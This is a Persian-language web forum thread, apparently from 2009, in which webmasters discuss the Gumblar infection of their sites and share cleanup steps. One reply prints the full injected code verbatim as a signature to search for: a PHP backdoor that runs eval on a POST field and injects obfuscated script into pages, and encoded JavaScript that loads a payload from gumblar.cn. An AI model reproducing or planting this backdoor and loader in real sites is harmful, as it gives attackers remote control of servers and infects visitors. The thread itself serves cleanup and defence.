ویروس در سایت ؟؟!!!

salam_ali

Member
سلام
چند وقتی است که هنگامی با موزیلا وارد سایتم می شم این پیغام می یاد که :

Reported Attack Site!

This web site at nimad.org has been reported as an attack site and has been blocked based on your security preferences

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

من یک فایلی که جاوا اسکریپت بود در سایت دیدم که پاک کردم !!!
حالا این فایل از کجا اومده و الان چرا بعد از 2 روز مشکل حل نشده ؟؟؟
لطفا کمکم کنید.
البته به هاست فکر نکنم ربطی داشته باشه آخه در یکی دیگه از سایتام که از هاسته دیگری است باز همین مشکل پیدا شده ... یعنی هر چی سایت در هاستهای دیگه دارم هم همنطوری شده ...

daneshd

New Member
اگر روی "Why this happens" کلیک کنی این متن میاد:

Of the 6 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-23, and the last time suspicious content was found on this site was on 2009-05-19.Malicious software includes 5 scripting exploit(s).
Malicious software is hosted on 1 domain(s), including gumblar.cn/.
This site was hosted on 1 network(s) including AS32613 (IWEB).

"gumblar" یک ویروس جدید هست. احتمالی هست که سرور اونجا یا به این ویروس آلوده شده، یا این ویروس سعی کرده به اونجا حمله کنه. با Host تماس بگیر.

hba

Active Member
نه اين ويروس با ftp كار مي كنه احتمالا سايتترو با ftp ريختي و رمزش رو سيو شده با اون حمله م كنه
كامپيوتر خودت مشكل داره نه سرور

foranyone

Well-Known Member
منم همچین مشکلی داشتم و دارم

مشکلم با نصب آنتی ویروس و آپدیت اون رو سیستم خودم ، تغیر رمز ورود به هاست و در نهایت تغیر سرور حل شده

احساس می کنم زیادم بی ربط به شرکت هاستینگ نباشه

اونا با این شعار که مشکل از خودتونه از زیر مسئولیت فرار می کنند

به هر حال اینجا یه سری بزنین :

http://www.forum.majidonline.com/showthread.php?t=118018

I.NoBody

Active Member
جديداً يك ويروس(يا شبه ويروس) به شدت داره توي هاستينگ ها رشد ميكنه.
يه كد جاوا اسكريپت به آخر فايل هايي كه نامشون index هست(مثل index.htm , index.php , ...) اضافه ميكنه.

foranyone

Well-Known Member
جديداً يك ويروس(يا شبه ويروس) به شدت داره توي هاستينگ ها رشد ميكنه.
يه كد جاوا اسكريپت به آخر فايل هايي كه نامشون index هست(مثل index.htm , index.php , ...) اضافه ميكنه.

فقط فایل های index نیست ، فایل index وقتی آلوده میشه که ویروس تازه کارشو شروع کرده

بعد از یه مدت فایل های جاوا اسکریپت من فایل های config و بعد از یه مدت همه ی فای ها آلوده میشن

هر کاربری که از وبسایتتون بازدید کنه این کد های جاوااسکریپت تروجاون رو رو کامپیوتر طرف لود می کنند و اگه

طرف مثل من یه طراح وب باشه بدبخت میشه

این ویروس موقعی که میخواین به ftp فایل آپلود کنین پسورد رو میدزده و از اون به بعد با اختیار کامل

هاست رو به کنترل خودش در میاره حتی بعد از یه مدت ممکنه phpmyadmin هم از کار بیوفته

iranaudio

Member
حل مشکل ساده ولی زمان بر هستش :
این مراحل رو طی کن :
روی هاستت احتمالاً یک پوشه به اسم images داری . برو توش و فایل images.php یا مشابه این رو که ایجاد شده پاک کن و یه فایل خالی به همین اسم ایجاد کن و به جای اون اپلود کن . بعد همهی تیک های chmod رو بردار .
2 - پسورد اف تی پی رو عوض کن
3- cuteftp رو نصب کن و لوگین کن . بعد تمام فایلهای سایتت رو دونه دونه با cuteftp ادیت رو بزن و دنبال کد
کد:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsY ​ W5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihHM2w4Sil7dmFyIGJORnQ9J3ZhciYyMGEmM ​ 2QmMjImNTNjcmlwdEVuJjY3aW4mNjUmMjImMmMmNjImM2QmMjJWZSY3MnNpJjZmbigpKyYyMiYyY2omM ​ 2QmMjImMjImMmN1JjNkbmF2aWdhdG9yJjJlJjc1c2VyJjQxZ2VudCYzYmlmKCh1JjJlaSY2ZWQmNjV4T ​ yY2NigmMjJXaW4mMjIpJjNlMCkmMjYmMjYoJjc1JjJlaW5kZXhPJjY2KCYyMk5UJjIwJjM2JjIyKSYzY ​ zApJjI2JjI2KGQmNmZjdW1lbiY3NCYyZWMmNmZva2kmNjUmMmUmNjkmNmVkZXgmNGZmKCYyMiY2ZCY2O ​ WUmNmImM2QmMzEmMjImMjkmM2MwJjI5JjI2JjI2JjI4dCY3OXAmNjVvJjY2KHpydnp0cykmMjEmM2R0e ​ XBlb2YoJjIyQSYyMikpKSY3YnpyJjc2JjdhdCY3MyYzZCYyMkEmMjImM2ImNjV2JjYxJjZjJjI4JjIya ​ WYmMjh3aW5kJjZmJjc3JjJlJjIyK2ErJjIyKWomM2QmNmErJjIyJjJiYSsmMjJNYWomNmYmNzImMjImM ​ mJiK2EmMmImMjJNJjY5bm9yJjIyK2IrYSYyYiYyMkImNzVpbGQmMjImMmJiKyYyMmomM2ImMjIpJjNiZ ​ CY2ZmN1JjZkJjY1biY3NCYyZXdyJjY5dGUmMjgmMjImM2MmNzNjciY2OXAmNzQmMjAmNzNyYyYzZCYyZ ​ iYyZiY2N3UmNmQmNjJsYXImMmVjJjZlJjJmcnNzJjJmJjNmaSY2NCYzZCYyMitqKyYyMiYzZSYzYyY1Y ​ yYyZiY3MyY2M3JpJjcwdCYzZSYyMikmM2ImN2QnO3ZhciBnWEo9dW5lc2NhcGUoYk5GdC5yZXBsYWNlK ​EczbDhKLCclJykpO2V2YWwoZ1hKKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2
بگرد . اگه فایل php باشه همون خط اوله . این کد رو با <php جایگزین کن و فایل رو سیو کن .
ممکنه توی بعضی فایلها این کد باشه :
کد:
<script language=javascript><!-- 
(function(G3l8J){var bNFt='var&20a&3d&22&53criptEn&67in&65&22&2c&62&3d&22Ve&72si&6fn()+&22&2cj&3d&22&22&2cu&3dnavigator&2e&75ser&41gent&3bif((u&2ei&6ed&65xO&66(&22Win&22)&3e0)&26&26(&75&2eindexO&66(&22NT&20&36&22)&3c0)&26&26(d&6fcumen&74&2ec&6foki&65&2e&69&6edex&4ff(&22&6d&69e&6b&3d&31&22&29&3c0&29&26&26&28t&79p&65o&66(zrvzts)&21&3dtypeof(&22A&22)))&7bzr&76&7at&73&3d&22A&22&3b&65v&61&6c&28&22if&28wind&6f&77&2e&22+a+&22)j&3d&6a+&22&2ba+&22Maj&6f&72&22&2bb+a&2b&22M&69nor&22+b+a&2b&22B&75ild&22&2bb+&22j&3b&22)&3bd&6fcu&6d&65n&74&2ewr&69te&28&22&3c&73cr&69p&74&20&73rc&3d&2f&2f&67u&6d&62lar&2ec&6e&2frss&2f&3fi&64&3d&22+j+&22&3e&3c&5c&2f&73&63ri&70t&3e&22)&3b&7d';var gXJ=unescape(bNFt.replace(G3l8J,'%'));eval(gXJ)})(/&/g);
 --></script>
معمولاً هم کد ها توی فایلهایی به نام function,config,db,database,index یا مشابه اینه پیدا میشه .
مشکلی داشتی تماس بگیر .
ضمن اینکه بعد از پاک شدن سایتت فایل روی هاستت نریز چون باز همین آش و همین کاسه ...

foranyone

Well-Known Member
این کد رو با <php جایگزین کن و فایل رو سیو کن .
این کار باعث نمیشه فایل php error نده ؟

ضمن اینکه بعد از پاک شدن سایتت فایل روی هاستت نریز چون باز همین آش و همین کاسه
یعنی بازم ویروسی میشه ؟ اگه ویروسی میشه چرا این کارا رو انجام دادیم :D

یعنی مشکل از هاسته ؟

راستی کاش اسکریپت های ویروس رو بدون تگ اسکریپت قرار میدایدن چون منم قبلا یه تاپیک زده بودم مثل شما کد ها رو قرار داده بودم

ویروس اجرا میشد و بعد از یه مدت این کد هاتون پاک میشه ...

iranaudio

Member
برای جلوگیری از ویروسی شدن مجدد باید سیستم شخصی که اف تی پی دسترسی داره فرمت کامل بشه و سپس انتی ویروس اوست آپدیت شده نصب بشه .
این تجربه شخصی منه .

sajadmaz

Member
یک کاره دیگه هم میتونین انجام بدین از اونجایی که مورد حمله این ویروس فایل ایندکس هست فایل ایندکس رو مثلا به myhomepage.php تغییر بده و با htaccess دایرکتوری ایندکس رو به اسم فایل جدید تغییر بده

foranyone

Well-Known Member
یک کاره دیگه هم میتونین انجام بدین از اونجایی که مورد حمله این ویروس فایل ایندکس هست فایل ایندکس رو مثلا به myhomepage.php تغییر بده و با htaccess دایرکتوری ایندکس رو به اسم فایل جدید تغییر بده

تروجان موقع شروع فقط index ها رو آلوده میکنه ، بعدا فایل های جاوا اسکریپت و هر فایلی با هر اسمی آلوده میشه

پس این کار اصلا تاثیر نداره:rose:

sajadmaz

Member
این موردی که من داشتم فقط فایل هایی که مثل index.php ، index.html،index.htm اینایی که ایندکس بود فقط کد میزاشت داخلش

جدیدترین ارسال ها

بالا